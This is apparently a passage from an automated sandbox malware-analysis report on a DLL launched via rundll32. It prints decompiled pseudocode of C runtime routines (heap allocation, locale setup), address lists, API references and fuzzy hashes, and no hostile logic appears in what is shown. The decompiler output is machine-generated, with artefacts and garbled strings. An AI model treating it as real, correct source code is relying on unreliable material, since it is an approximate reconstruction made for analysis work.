                          0x6e200798
                          0x6e200798
                          0x6e2007c7
                          0x6e2007c8
                          0x6e2007c9
                          0x6e2007cd
                          0x6e2007d4
                          0x6e20082a
                          0x6e20082c
                          0x6e200830
                          0x6e2007f2
                          0x6e2007f4
                          0x6e2007f5
                          0x6e2007fc
                          0x6e200842
                          0x6e200842
                          0x6e2007fe
                          0x6e20080f
                          0x6e200818
                          0x6e20081c
                          0x6e20081c
                          0x6e200844
                          0x6e200846
                          0x6e20084f
                          0x6e200853
                          0x6e200855
                          0x6e200855
                          0x6e20085c
                          0x6e20085c
                          0x6e200869
                          0x6e20086d
                          0x6e200873
                          0x6e200877
                          0x6e20088d
                          0x6e200894
                          0x6e200896
                          0x6e200899
                          0x6e20089e
                          0x6e2008a2
                          0x6e2008a9
                          0x6e2008ad
                          0x6e2008b3
                          0x6e2008b7
                          0x6e2008ba
                          0x6e200924
                          0x6e20092a
                          0x6e20092d
                          0x6e200931
                          0x6e200933
                          0x00000000
                          0x00000000
                          0x6e20093c
                          0x6e200940
                          0x6e200947
                          0x6e20094b
                          0x6e20094b
                          0x6e20094d
                          0x6e20094f
                          0x00000000
                          0x6e2008bc
                          0x6e2008cc
                          0x6e2008cf
                          0x6e2008f6
                          0x6e2008fc
                          0x6e200900
                          0x6e200900
                          0x6e2008d1
                          0x6e2008e4
                          0x6e2008e4
                          0x6e200907
                          0x6e200908
                          0x6e20090f
                          0x6e20091e
                          0x6e200955
                          0x6e200955
                          0x6e200959
                          0x6e200966
                          0x00000000
                          0x6e200966
                          0x6e2007d6
                          0x6e2007e3
                          0x6e2007e3
                          0x6e2007e5
                          0x6e2007e9
                          0x00000000
                          0x6e2007e9
                          0x6e2007d4
                          0x6e200776
                          0x6e20069a
                          0x6e200610
                          0x6e200980
                          0x6e200985
                          0x6e20098a
                          0x6e20098e
                          0x6e200991
                          0x6e200995
                          0x6e200998
                          0x6e2009bb
                          0x6e2009c1
                          0x6e2009c1
                          0x6e2009c4
                          0x6e2009c8
                          0x6e20099a
                          0x6e2009aa
                          0x6e2009ae
                          0x6e2009ae
                          0x6e2009db
                          0x6e2009e3
                          0x6e2009e7
                          0x6e2009e8
                          0x6e2009ef
                          0x6e200a0c
                          0x6e200a0c
                          0x6e200a10
                          0x6e2009f1
                          0x6e2009fe
                          0x6e200a00
                          0x6e200a00
                          0x6e200a1a
                          0x6e200a20
                          0x6e200a25
                          0x6e200a38
                          0x6e200a44
                          0x6e200a47
                          0x6e200a5f
                          0x6e200a5f
                          0x6e200a49
                          0x6e200a54
                          0x6e200a54
                          0x6e200a6d
                          0x6e200a78
                          0x6e200a78
                          0x6e20034a

                          APIs
                          • Sleep.KERNELBASE(00000071), ref: 6E2006E9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: 2$DZ,n$DZ,n$DZ,n$EQ$L$T$Y,n
                          • API String ID: 3472027048-653928141
                          • Opcode ID: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
                          • Instruction ID: 4a0a675bf42e61a391a0ac0831cee13419d77d656197b3721e979498ae3cb2c2
                          • Opcode Fuzzy Hash: ab14fc04ed549c28c4de31b0a532c140bed70b84bc4f9a8c0d94e6447a089954
                          • Instruction Fuzzy Hash: CD92DE716483528FCB48CF6AC59956ABBF2BBDA600F40192EF0C5CB391E375C845CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2078D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 66%
                          			E6E2078D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6E2200AC(0x6e268421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6e26aa30;
				_t21 = E6E21F8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E207005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6E207F47(_t19);
				return E6E220075(_t19);
			}







                          0x6e2078da
                          0x6e2078df
                          0x6e2078e1
                          0x6e2078e3
                          0x6e2078ee
                          0x6e2078f3
                          0x6e207906
                          0x6e207906
                          0x6e2078f5
                          0x6e2078f5
                          0x6e2078f9
                          0x6e2078fb
                          0x6e207901
                          0x6e207901
                          0x6e20790a
                          0x6e20790d
                          0x6e207919

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E2078DA
                          • std::locale::_Init.LIBCPMT ref: 6E2078FB
                            • Part of subcall function 6E207005: __EH_prolog3.LIBCMT ref: 6E20700C
                            • Part of subcall function 6E207005: std::_Lockit::_Lockit.LIBCPMT ref: 6E207017
                            • Part of subcall function 6E207005: std::locale::_Setgloballocale.LIBCPMT ref: 6E207032
                            • Part of subcall function 6E207005: _Yarn.LIBCPMT ref: 6E207048
                            • Part of subcall function 6E207005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E207088
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 3152668004-0
                          • Opcode ID: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction ID: 75a7b05ee0c68bce66fa10d362e75f8cb1b0a555dd5c666b178b86233fd882a4
                          • Opcode Fuzzy Hash: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
                          • Instruction Fuzzy Hash: 77E0267AA2162E5FE31167E48511FDDE2977F80B18F62051AD2009F2C0DFF45E0047C1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24C7EF, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 330 6e24c7ef-6e24c7fa 331 6e24c7fc-6e24c806 330->331 332 6e24c808-6e24c80e 330->332 331->332 333 6e24c83c-6e24c847 call 6e242281 331->333 334 6e24c827-6e24c838 RtlAllocateHeap 332->334 335 6e24c810-6e24c811 332->335 339 6e24c849-6e24c84b 333->339 336 6e24c813-6e24c81a call 6e25beb2 334->336 337 6e24c83a 334->337 335->334 336->333 343 6e24c81c-6e24c825 call 6e249256 336->343 337->339 343->333 343->334
                          C-Code - Quality: 95%
                          			E6E24C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e2c7b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E25BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E242281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E249256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}












                          0x6e24c7ef
                          0x6e24c7f5
                          0x6e24c7fa
                          0x6e24c808
                          0x6e24c808
                          0x6e24c80e
                          0x6e24c810
                          0x6e24c810
                          0x6e24c827
                          0x6e24c830
                          0x6e24c838
                          0x00000000
                          0x00000000
                          0x6e24c818
                          0x6e24c81a
                          0x6e24c83c
                          0x6e24c841
                          0x6e24c847
                          0x00000000
                          0x6e24c847
                          0x6e24c81d
                          0x6e24c822
                          0x6e24c823
                          0x6e24c825
                          0x00000000
                          0x00000000
                          0x6e24c825
                          0x00000000
                          0x6e24c827
                          0x6e24c800
                          0x6e24c801
                          0x6e24c806
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E24D6B4,00000001,00000364,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9), ref: 6E24C830
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
                          • Instruction ID: 3a5aac1f80403b24fa083e3f63f6db80e1e531fb3a1c62784714f822dcba6094
                          • Opcode Fuzzy Hash: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
                          • Instruction Fuzzy Hash: 2BF02B3150052FDBBB5B5AEFC806A47374F9F51F71B0682219C149E180CB30D814C2E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24F26D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 346 6e24f26d-6e24f279 347 6e24f2ab-6e24f2b6 call 6e242281 346->347 348 6e24f27b-6e24f27d 346->348 355 6e24f2b8-6e24f2ba 347->355 350 6e24f296-6e24f2a7 RtlAllocateHeap 348->350 351 6e24f27f-6e24f280 348->351 352 6e24f282-6e24f289 call 6e25beb2 350->352 353 6e24f2a9 350->353 351->350 352->347 358 6e24f28b-6e24f294 call 6e249256 352->358 353->355 358->347 358->350
                          C-Code - Quality: 94%
                          			E6E24F26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E242281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e2c7b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E25BEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6E249256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}










                          0x6e24f26d
                          0x6e24f273
                          0x6e24f279
                          0x6e24f2ab
                          0x6e24f2b0
                          0x6e24f2b6
                          0x00000000
                          0x6e24f2b6
                          0x6e24f27d
                          0x6e24f27f
                          0x6e24f27f
                          0x6e24f296
                          0x6e24f29f
                          0x6e24f2a7
                          0x00000000
                          0x00000000
                          0x6e24f287
                          0x6e24f289
                          0x00000000
                          0x00000000
                          0x6e24f28c
                          0x6e24f291
                          0x6e24f292
                          0x6e24f294
                          0x00000000
                          0x00000000
                          0x6e24f294
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
                          • Instruction ID: d08f9745354f46918723af8160d69c7cec27c41a0155eabfe6afdc87fe1b7d67
                          • Opcode Fuzzy Hash: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
                          • Instruction Fuzzy Hash: EDE0302A64062BDBF79996E6D814B8B7B9BAFC27A2B2516109D35971C0CB20C900C1A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21F9E7, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 56%
                          			E6E21F9E7(void* __ebx, void* __ecx, void* __edx) {
				void* _t3;
				void* _t10;

				if(E6E22079B() == 0) {
					_push(E6E20815F()); // executed
					_t3 = E6E249E70(__ecx, __edx); // executed
					_pop(_t10);
					if(_t3 == 0) {
						L6E24A4FC(__ebx, _t10);
						goto L5;
					} else {
						return 0;
					}
				} else {
					E6E220604(__edx);
					L5:
					return 1;
				}
			}





                          0x6e21f9ee
                          0x6e21f9fc
                          0x6e21f9fd
                          0x6e21fa02
                          0x6e21fa05
                          0x6e21fa0a
                          0x00000000
                          0x6e21fa07
                          0x6e21fa09
                          0x6e21fa09
                          0x6e21f9f0
                          0x6e21f9f0
                          0x6e21fa0f
                          0x6e21fa11
                          0x6e21fa11

                          APIs
                          • ___isa_available_init.LIBCMT ref: 6E21F9F0
                            • Part of subcall function 6E220604: IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E22061D
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor___isa_available_init
                          • String ID:
                          • API String ID: 1134542133-0
                          • Opcode ID: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
                          • Instruction ID: cae7b697ecec913a3442ad7f09779258dbb297b9291b7c4184c29a01fbe2169c
                          • Opcode Fuzzy Hash: 9730a72df3bd01377a0f65105c100b5bb7fbad41c174d80457b8ba70273eb9d5
                          • Instruction Fuzzy Hash: E9C0804C10418F5B7D4423F55634DEF23CF1C491897641CA19630C5851FF09C5425033
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6E25E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E6E25E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e2c506c; // 0x8e829fa6
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e24e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E24D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E24D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e24e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e272f04; // 0x17
					E6E25E68F(0, " )'nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e24e03b
					E6E25E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e24e03b
						E6E25E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e24e03b
						E6E25E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e272dec; // 0x41
						_t77 = E6E25E68F(_t99, "t!\'nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E25E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E21F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E265124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E25E112(_t92, _t99,  &_v20);
						} else {
							E6E25E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                          0x6e25e6f4
                          0x6e25e6fb
                          0x6e25e702
                          0x6e25e702
                          0x6e25e706
                          0x6e25e70a
                          0x6e25e718
                          0x6e25e71d
                          0x6e25e71e
                          0x6e25e71f
                          0x6e25e720
                          0x6e25e725
                          0x6e25e728
                          0x6e25e72a
                          0x6e25e730
                          0x6e25e736
                          0x6e25e739
                          0x6e25e73b
                          0x6e25e73e
                          0x6e25e742
                          0x6e25e749
                          0x6e25e756
                          0x6e25e75b
                          0x6e25e75e
                          0x6e25e761
                          0x6e25e761
                          0x6e25e763
                          0x6e25e766
                          0x6e25e76a
                          0x6e25e7da
                          0x6e25e7dc
                          0x6e25e7de
                          0x6e25e7f1
                          0x6e25e7f1
                          0x6e25e7f8
                          0x6e25e7fe
                          0x6e25e801
                          0x00000000
                          0x6e25e801
                          0x6e25e7e0
                          0x6e25e7e3
                          0x00000000
                          0x00000000
                          0x6e25e7e5
                          0x6e25e7e9
                          0x6e25e7ee
                          0x00000000
                          0x6e25e771
                          0x6e25e771
                          0x6e25e775
                          0x6e25e787
                          0x6e25e78b
                          0x6e25e77c
                          0x6e25e77c
                          0x6e25e780
                          0x6e25e780
                          0x6e25e794
                          0x6e25e795
                          0x6e25e81f
                          0x6e25e81f
                          0x00000000
                          0x6e25e79b
                          0x6e25e79b
                          0x6e25e7aa
                          0x6e25e7af
                          0x6e25e7b4
                          0x6e25e804
                          0x6e25e804
                          0x6e25e804
                          0x6e25e806
                          0x6e25e80a
                          0x6e25e821
                          0x6e25e82d
                          0x6e25e837
                          0x6e25e83a
                          0x6e25e83b
                          0x6e25e83d
                          0x00000000
                          0x00000000
                          0x6e25e83f
                          0x6e25e845
                          0x00000000
                          0x00000000
                          0x6e25e847
                          0x6e25e84d
                          0x00000000
                          0x00000000
                          0x6e25e853
                          0x6e25e859
                          0x6e25e85b
                          0x00000000
                          0x00000000
                          0x6e25e862
                          0x6e25e868
                          0x6e25e86a
                          0x00000000
                          0x00000000
                          0x6e25e86c
                          0x6e25e86f
                          0x6e25e871
                          0x6e25e873
                          0x6e25e873
                          0x6e25e884
                          0x6e25e889
                          0x6e25e88b
                          0x6e25e8eb
                          0x6e25e80e
                          0x6e25e81e
                          0x6e25e81e
                          0x6e25e89a
                          0x6e25e8aa
                          0x6e25e8b0
                          0x6e25e8b2
                          0x00000000
                          0x00000000
                          0x6e25e8c9
                          0x6e25e8cf
                          0x6e25e8d1
                          0x00000000
                          0x00000000
                          0x6e25e8e3
                          0x00000000
                          0x6e25e8e8
                          0x6e25e80c
                          0x00000000
                          0x6e25e80c
                          0x6e25e7b6
                          0x6e25e7b8
                          0x6e25e7bc
                          0x6e25e7d2
                          0x6e25e7c3
                          0x6e25e7c7
                          0x6e25e7c7
                          0x6e25e7d7
                          0x00000000
                          0x6e25e7d7
                          0x6e25e795

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D66B
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E25E7F8
                          • IsValidCodePage.KERNEL32(00000000), ref: 6E25E853
                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E25E862
                          • GetLocaleInfoW.KERNEL32(?,00001001,;$n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E25E8AA
                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E25E8C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID: )'nU$;$n$;$n$;$n$t!'nE
                          • API String ID: 745075371-2121107865
                          • Opcode ID: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction ID: 31848dbe8ed06705351c518260bf3401cceb05052acfd820eda98e982d1971bc
                          • Opcode Fuzzy Hash: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction Fuzzy Hash: 03516D7290021FABEF50DFE5CD48ABE77BAEF05701F044569E920EB250EB709960CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E6E25DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E24D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E25DD27(" )'nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
